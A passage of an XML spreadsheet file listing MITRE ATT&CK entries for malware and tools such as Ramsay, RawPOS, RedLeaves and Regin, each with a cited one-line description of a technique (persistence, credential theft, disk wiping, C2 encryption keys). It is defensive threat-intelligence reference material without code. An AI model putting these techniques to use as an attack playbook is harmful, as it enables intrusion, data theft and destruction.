    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use TCP in C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--b23da7b5-0d2d-4cfa-a2ad-ea89d86fecc6</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has downloaded as a XOR-encrypted payload.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--7ab8913b-25bc-41c7-9149-625ec14322f3</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can enumerate processes on a target system.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--66addef3-8b7a-4571-b919-2b70f5991990</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use proxy tools including boost_proxy_client for reverse proxy functionality.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--a01e0e7c-1694-4a6a-8fea-4d4d8a83e034</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use scheduled tasks to achieve persistence.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--afea5bf8-f6e0-4b93-8de6-da2e0cd6f569</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has the ability to capture screenshots.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--ac773743-8f22-4193-a2de-b562e7a13709</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use RC4 to encrypt C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--e08a510f-65b2-4676-9667-848166ba22b4</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can create and register a service for execution.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--56b8f3d1-c08e-42a1-8d14-b961391eaaa7</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use HTTP in C2 communications.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--32a6902a-b0bb-46c0-878a-2399e4cd4aeb</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use the Windows Command Shell for execution.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--96fdbe95-300b-4e7f-9246-35b8f42e5680</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--ae8375ef-1dd7-4b03-9fc9-ade303030cae</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use services to establish persistence.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--95d43b58-992e-4970-b22b-54f0da8ca4cd</t>
  </si>
  <si>
    <t>S0458</t>
  </si>
  <si>
    <t>Ramsay</t>
  </si>
  <si>
    <t>malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can insert itself into the address space of other applications using the AppInit DLL Registry key.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--f96794d1-0707-4897-9de1-08546b605bf0</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>relationship--71abba24-84a2-449d-811a-ba006382d723</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can compress and archive collected files using WinRAR.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--756f3884-c21b-4d00-ac2c-6c2ab386072f</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</si>
  <si>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</si>
  <si>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relationship--a6046634-68c8-4a9e-a58f-58fd8876346a</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can use [UACMe](https://attack.mitre.org/software/S0116) for privilege escalation.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>relationship--a024097d-78f0-4439-a239-571d361335f5</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use the Windows COM API to schedule tasks and maintain persistence.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>relationship--f1c2c698-e374-4ab1-b478-49e987d3a184</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--55e67f6b-600a-4196-b497-63019731e66e</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</si>
  <si>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</si>
  <si>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relationship--3feb6e83-0491-4e3d-a581-3f68ab839e92</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can collect data from network drives and stage it for exfiltration.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--6c692a16-22b8-42bb-9a6b-3c25a2714cf5</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can collect data from removable media and stage it for exfiltration.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--f86c19e6-39a1-423c-8db2-a8258ac51bd6</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can extract its agent from the body of a malicious document.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--ed6d663f-510b-4702-9c2a-ef40cc4d88c7</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has been delivered using OLE objects in malicious documents.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--0709589f-cc25-4925-89be-59e121c47951</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;ImprovedReflectiveDLLInjection&lt;/code&gt; to deploy components.(Citation: Eset Ramsay May 2020) </t>
  </si>
  <si>
    <t>relationship--d10e82b8-7f30-4845-af05-44ac3287bf70</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--76a3097b-808d-45a9-aa81-dce5ed6a45d3</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can collect directory and file lists.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>relationship--cde9af4e-4bf9-4235-9d27-496eb78e3608</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</si>
  <si>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</si>
  <si>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relationship--4b03f718-f89a-4652-b3be-5cbe4e0e044f</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been executed through malicious e-mail attachments.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--d4f17f68-7a50-428f-b26d-94dcbf861ec5</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a JPG image file.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>relationship--a38af2cc-ccc7-41aa-936c-fe15a13ddafa</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a 7zip installer.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>relationship--882002ca-25a6-4226-9cc4-3efe5f798449</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</si>
  <si>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</si>
  <si>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relationship--239eb918-b9e0-499c-9934-96382fa782a0</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can scan for systems that are vulnerable to the EternalBlue exploit.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>relationship--2c9fad15-9b3f-45fe-854a-c87113d4695c</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can scan for network drives which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>relationship--0428220b-eb98-45c3-a637-7da54b4496b4</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has base64-encoded its portable executable and hidden itself under a JPG header. [Ramsay](https://attack.mitre.org/software/S0458) can also embed information within document footers.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--e273286f-8ca7-4d3e-bdc3-08929c7cbd12</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can scan for removable media which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>relationship--55d84559-7bb9-4e17-be60-7694e4219877</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can gather a list of running processes by using [Tasklist](https://attack.mitre.org/software/S0057).(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--8d5a8f57-0d67-462f-a4f5-7fc4268e4ab2</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has created Registry Run keys to establish persistence.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--96062ede-31e8-4777-8b81-39e8a9e8b88e</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on removable drives.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--c8f639f8-9717-485a-ad4c-7eb1fc771691</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has included a rootkit to evade defenses.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--2962304a-f96e-4323-958f-f685eae97ac6</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can schedule tasks via the Windows COM API to maintain persistence.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--417912a3-95a8-4dd4-a586-88cca62f3ebc</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can take screenshots every 30 seconds as well as when an external removable storage device is connected.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--145d2112-b679-4d72-b484-7524f944e128</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been distributed through spearphishing emails with malicious attachments.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--3890dead-331f-498d-b99d-2191150ae2ac</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has used base64 to encode its C2 traffic.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--f1bd5050-739b-4a22-a1a6-f80e70cb8192</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has PE data embedded within JPEG files contained within Word documents.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--879ee01b-0517-42bd-8ac8-3857e63e40c4</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</si>
  <si>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</si>
  <si>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relationship--81a857bb-4c36-4875-a62e-30e7b12eae12</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use [ipconfig](https://attack.mitre.org/software/S0100) and [Arp](https://attack.mitre.org/software/S0099) to collect network configuration information, including routing information and ARP tables.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--1884ba87-a1c8-496b-9517-abb379911166</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;netstat&lt;/code&gt; to enumerate network connections.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--eb9fb4e7-1b43-41ee-88e1-a3f93a278082</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on networks shared drives.(Citation: Eset Ramsay May 2020)	</t>
  </si>
  <si>
    <t>relationship--365f82e7-6fad-44a7-855d-955d4307920f</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) has included embedded Visual Basic scripts in malicious documents.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	</t>
  </si>
  <si>
    <t>relationship--d9898b1f-9056-400c-9b26-26c87500cfe3</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has used HTTP for C2.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>relationship--30e61544-d516-40ee-afac-8fd9deecd017</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>relationship--d7d25f15-7451-4092-acb5-1a22095bc3cd</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>relationship--7fa1a7c8-0dfb-4bd5-a34f-509ba24da5be</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to help overwrite components of disk structure like the MBR and disk partitions.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>relationship--6add4de1-3af8-4994-b65f-ccb13fdd703a</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) encodes credit card data it collected from the victim with XOR.(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)(Citation: Visa RawPOS March 2015)</t>
  </si>
  <si>
    <t>relationship--53ad6525-7888-4651-bd43-c010b489ccc0</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--92fb7408-1638-43b7-95a3-0cfeebd7624d</t>
  </si>
  <si>
    <t>30 October 2019</t>
  </si>
  <si>
    <t>Data captured by [RawPOS](https://attack.mitre.org/software/S0169) is placed in a temporary file under a directory named "memdump".(Citation: Kroll RawPOS Jan 2017)</t>
  </si>
  <si>
    <t>relationship--b25f5d90-f6cc-47e9-89f1-5527886bf536</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</si>
  <si>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</si>
  <si>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relationship--37aa4e22-824b-468c-ae46-d9d007cc7cc7</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) installs itself as a service to maintain persistence.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--d0b2e189-e764-44ec-9373-2f23212f6a45</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can compress files using `gzip` prior to exfiltration.(Citation: Rclone)</t>
  </si>
  <si>
    <t>relationship--d263240f-c368-4796-96cc-f574f31fc2ae</t>
  </si>
  <si>
    <t>The [Rclone](https://attack.mitre.org/software/S1040) "chunker" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.(Citation: Rclone)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--b351cd80-323d-4e67-a539-547a76d9e257</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can exfiltrate data over SFTP or HTTPS via WebDAV.(Citation: Rclone)</t>
  </si>
  <si>
    <t>relationship--d3a5df12-454a-44f7-a3d1-9154dcc815e9</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can exfiltrate data over FTP or HTTP, including HTTP via WebDAV.(Citation: Rclone)</t>
  </si>
  <si>
    <t>relationship--fba63e06-710f-4f04-b446-be8509ea0a5e</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.(Citation: Rclone)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--1ae24ad1-8730-4a38-8d68-dd57b335b9b4</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) can list files and directories with the `ls`, `lsd`, and `lsl` commands.(Citation: Rclone)</t>
  </si>
  <si>
    <t>relationship--4322a0e4-1653-416a-81c1-cfc8a7cfd69e</t>
  </si>
  <si>
    <t>S0172</t>
  </si>
  <si>
    <t>Reaver</t>
  </si>
  <si>
    <t>malware--65341f30-bec6-4b1d-8abf-1a5620446c29</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) encrypts collected data with an incremental XOR key prior to exfiltration.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--98d3455f-49cc-4539-ba35-4b11bec0ddcd</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) drops and executes a malicious CPL file as its payload.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--ad4bd339-7416-45de-8202-f91c6909be05</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) deletes the original dropped file from the victim.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--3bf633d0-5578-4e3a-a599-52f3946f6623</t>
  </si>
  <si>
    <t>Some [Reaver](https://attack.mitre.org/software/S0172) variants use raw TCP for C2.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--67f82f6c-18f1-4f1e-8352-b7ecf8839ea2</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) encrypts some of its files with XOR.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--5077f774-95a4-459e-b88c-cb3a4dd5c8c6</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) queries the Registry to determine the correct Startup path to use for persistence.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--f44478f1-fdd7-4e84-8b96-60e6c6a10683</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) creates a shortcut file and saves it in a Startup folder to establish persistence.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--3dcf441c-b987-4c6a-93e7-e24ae1e16475</t>
  </si>
  <si>
    <t>relationship--0fee8bfd-aec2-44a7-8182-530a648006f3</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</si>
  <si>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</si>
  <si>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relationship--edbd751e-29ad-419f-a3ff-9d210453351d</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects the victim's IP address.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--f6cb3957-be7f-41bf-ad44-3dfbd7a5dfe2</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects the victim's username.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--e0a0966c-7a2f-41b3-962f-3a6b22a5a8a9</t>
  </si>
  <si>
    <t>Some [Reaver](https://attack.mitre.org/software/S0172) variants use HTTP for C2.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--797131cf-fef9-4ece-823f-e931393e72f8</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) installs itself as a new service.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>relationship--ecca0af0-1549-4068-b01d-bab711c491c5</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can gather browser usernames and passwords.(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>relationship--4086a9d6-5574-48fb-be8d-e8406145e740</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is launched through use of DLL search order hijacking to load a malicious dll.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--3f8a74a9-55fe-4f9c-bddb-00b715ca3668</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can delete specified files.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--6d51e34d-d2ee-41aa-9ec7-dc74c84ebe9f</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can enumerate and search for files and directories.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--d4ca926c-6976-4ee8-a5b0-89aa11931bea</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is capable of downloading a file from a specified URL.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--f4902ad9-b1bb-41ce-a448-55e2d9437503</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can use HTTP over non-standard ports, such as 995, for C2.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--ec55cdc1-8ca2-42c9-a1d9-9755d24bc294</t>
  </si>
  <si>
    <t>A [RedLeaves](https://attack.mitre.org/software/S0153) configuration file is encrypted with a simple XOR key, 0x53.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--6610332d-86a5-46dc-a0a1-31c2fe31f164</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>relationship--ed2f811d-3258-4489-abe1-57dac4bdbbf8</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can capture screenshots.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>relationship--48fb8267-5d68-467b-a2c0-8302cc15ebed</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) attempts to add a shortcut file in the Startup folder to achieve persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>relationship--07921720-429b-432c-8147-187162326ff2</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--b94e707d-b2f8-4b68-acac-44d3777dd93f</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</si>
  <si>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</si>
  <si>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relationship--a8f11c39-df96-451e-a93a-417512f82819</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can obtain information about network parameters.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--9b8ff36d-ff96-460a-b5cf-d369e7f598d9</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can enumerate drives and Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--ed45fb1c-048a-4378-8c15-6f6ea0c72d7a</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can obtain information about the logged on user both locally and for Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--bd8aaa70-710d-45a7-bb43-6b2e37f7c797</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can communicate to its C2 over HTTP and HTTPS if directed.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>relationship--c33c2a0f-eb88-43ef-be7b-6311bef2da3d</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can receive and execute commands with cmd.exe. It can also provide a reverse shell.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--9194756f-c455-427b-9fb0-4887c7bf3bf3</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to find credentials in the Windows Registry.(Citation: Pentestlab Stored Credentials)</t>
  </si>
  <si>
    <t>relationship--19e44b4d-fb66-43f9-8853-8e42692522b2</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.(Citation: Microsoft Reg)</t>
  </si>
  <si>
    <t>relationship--baabf444-1748-472f-b991-7a5b25e4e1bb</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.(Citation: Microsoft Reg)</t>
  </si>
  <si>
    <t>relationship--5365d764-76fa-49ce-b76b-d0344322b037</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can use Dropbox as its C2 server.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--a7e27068-7c65-45a0-968e-4871720f3348</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can decrypt strings with a key either stored in the Registry or hardcoded in the code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--8ea64034-60a6-466d-9434-19d05180626c</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can store its encryption key in the Registry.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--9d9b0e66-5b9d-4711-8e5a-23e2807ce7ef</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can download files from C2.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--342b69ad-118b-467d-838e-33ffa931af29</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can create seemingly legitimate Registry key to store its encryption key.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--87630bba-4308-46f2-9601-7d30795a2eb6</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can use control-flow flattening or the commercially available .NET Reactor for obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--c1b912a1-ffb4-4b33-88ec-6a567a1fcfd4</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can extract and execute PowerShell scripts from C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--851b7548-1ba4-402d-ae31-8336fa3ae47d</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can hide data in images, including use of the Least Significant Bit (LSB).(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--44d62933-848e-481e-84f9-7dbdec9a4b85</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can persist using a WMI consumer that is launched every time a process named WINWORD.EXE is started.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--604045bc-5d44-495f-a0cb-df73bd769d90</t>
  </si>
  <si>
    <t>S0019</t>
  </si>
  <si>
    <t>Regin</t>
  </si>
  <si>
    <t>malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) leveraged several compromised universities as proxies to obscure its origin.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--52cf8793-2f13-45c2-8274-1a9bf5d6224a</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including SMB.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--5e23c694-3f4a-43f7-823b-8ea36558c928</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) has used a hidden file system to store some of its components.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--223b8d4b-97e9-4581-91aa-a599fb787309</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--47109a67-e1af-4f5c-8c58-c1580ff5c6ec</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) contains a keylogger.(Citation: Kaspersky Regin)</t>
  </si>
